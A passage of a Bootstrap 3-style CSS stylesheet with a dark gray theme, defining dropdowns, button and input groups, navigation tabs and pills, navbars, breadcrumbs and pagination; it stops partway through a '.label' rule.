.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  list-style: none;
  font-size: 14px;
  text-align: left;
  background-color: #444444;
  border: 1px solid #444444;
  border-radius: 0px;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  background-clip: padding-box;
}
.dropdown-menu.pull-right {
  right: 0;
  left: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: normal;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  background-color: #373737;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
  cursor: not-allowed;
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  left: auto;
  right: 0;
}
.dropdown-menu-left {
  left: 0;
  right: auto;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  left: 0;
  right: 0;
  bottom: 0;
  top: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  right: 0;
  left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  border-top: 0;
  border-bottom: 4px solid;
  content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    left: auto;
    right: 0;
  }
  .navbar-right .dropdown-menu-left {
    left: 0;
    right: auto;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.btn-toolbar {
  margin-left: -5px;
}
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group > .btn-group {
  float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-left: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-bottom-left-radius: 0px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  float: none;
  display: table-cell;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-left: 0;
  padding-right: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: left;
  width: 100%;
  margin-bottom: 0;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.input-group-addon:first-child {
  border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.input-group-addon:last-child {
  border-left: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  margin-left: -1px;
}
.nav {
  margin-bottom: 0;
  padding-left: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  background-color: transparent;
  cursor: not-allowed;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #454444;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: left;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-right: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0px 0px 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
  cursor: default;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: left;
}
.nav-pills > li > a {
  border-radius: 0px;
}
.nav-pills > li + li {
  margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #454444;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-left: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0px;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: left;
  }
}
.navbar-collapse {
  overflow-x: visible;
  padding-right: 15px;
  padding-left: 15px;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-left: 0;
    padding-right: 0;
  }
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-right: -15px;
  margin-left: -15px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-right: 0;
    margin-left: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  right: 0;
  left: 0;
  z-index: 1030;
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.navbar-brand {
  float: left;
  padding: 17.5px 15px;
  font-size: 18px;
  line-height: 20px;
  height: 55px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-left: -15px;
  }
}
.navbar-toggle {
  position: relative;
  float: right;
  margin-right: 15px;
  padding: 9px 10px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0px;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 15px 5px 25px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: left;
    margin: 0;
  }
  .navbar-nav > li {
    float: left;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  margin-left: -15px;
  margin-right: -15px;
  padding: 10px 15px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-left: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    border: 0;
    margin-left: 0;
    margin-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: left;
    margin-left: 15px;
    margin-right: 15px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: left !important;
  }
  .navbar-right {
    float: right !important;
    margin-right: -15px;
  }
  .navbar-right ~ .navbar-right {
    margin-right: 0;
  }
}
.navbar-default {
  background-color: #454444;
  border-color: #383737;
}
.navbar-default .navbar-brand {
  color: #c4c4c4;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #abaaaa;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #c4c4c4;
}
.navbar-default .navbar-nav > li > a {
  color: #c4c4c4;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-toggle {
  border-color: #454444;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #454444;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #383737;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #c4c4c4;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-link {
  color: #c4c4c4;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #c4c4c4;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  background-color: #080808;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0px;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
  padding: 0 5px;
  color: #999999;
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-left: 0;
  margin: 20px 0;
  border-radius: 0px;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: left;
  padding: 6px 12px;
  line-height: 1.42857143;
  text-decoration: none;
  color: #454444;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  margin-left: -1px;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-left: 0;
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  color: #1e1e1e;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #454444;
  border-color: #454444;
  cursor: default;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  background-color: #ffffff;
  border-color: #dddddd;
  cursor: not-allowed;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pager {
  padding-left: 0;
  margin: 20px 0;
  list-style: none;
  text-align: center;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: right;
}
.pager .previous > a,
.pager .previous > span {
  float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  background-color: #ffffff;
  cursor: not-allowed;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
